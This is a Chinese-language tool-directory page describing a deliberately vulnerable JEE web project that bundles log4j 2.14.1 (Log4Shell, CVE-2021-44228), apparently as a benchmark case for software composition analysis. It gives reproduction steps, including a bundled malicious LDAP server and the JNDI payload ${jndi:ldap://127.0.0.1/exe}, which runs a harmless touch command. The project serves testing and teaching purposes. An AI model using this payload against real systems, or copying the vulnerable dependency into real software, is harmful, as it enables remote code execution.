Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
l4j-tp1 — 存在log4shell漏洞(CVE-2021-44228)的JEE Web项目 | Kitploit
工具/GitHubGitHub/scabench/l4j-tp1
漏洞分析漏洞利用Web安全供应链安全学习与教育实验室与实践
GitHubscabench/l4j-tp1

l4j-tp1

存在log4shell漏洞(CVE-2021-44228)的JEE Web项目

查看仓库
2年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

log4shell true positive

这是一个带有log4shell漏洞的简单Web项目。
该项目定义了一个简单的scabench.HelloWorldService获取服务,返回纯文本字符串hello world。
该服务不期望参数,如果遇到参数,则会记录错误。

存在漏洞的依赖项是org.apache.logging.log4j:log4j-core:2.14.1,漏洞为CVE-2021-44228。

使用测试演示漏洞

这需要Unix或macOS。将该项目移植到Windows很容易。

提供了一个单元测试来演示漏洞。测试需要一个提供漏洞代码的LDAP服务器,相应的可执行文件由项目提供,该服务器定义在一个单独的项目https://github.com/jensdietrich/Log4J-RCE-Proof-Of-Concept中,基于https://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concept。
测试装置将处理LDAP服务器的启动和关闭。

测试将根据log4j连接的LDAP服务器代码中嵌入的编码命令创建一个文件foo(touch foo)。该服务器可被攻击者控制。

要运行测试,使用mvn test构建项目。

运行应用程序演示漏洞

  1. 启动嵌入式Web服务器:mvn jetty:run
  2. 启动附带的LDAP服务器:java -jar dodgy-ldap-server.jar(漏洞代码将从该服务器下载Java代码)
  3. 将浏览器指向http://localhost:8080/,该站点包含一个预填表单,带有恶意载荷${jndi:ldap://127.0.0.1/exe}
  4. 提交此表单
  5. 这将在服务器上创建一个文件foo

运行软件组成分析

有几个sh脚本用于运行不同的分析,结果报告可在scan-results中找到。

生成SBOM

pom.xml中有一个插件,用于生成SBOM格式(CycloneDX)。为此,运行mvn cyclonedx:makePackageBom,SBOM可在target/中找到,格式为json和xml。

下载工具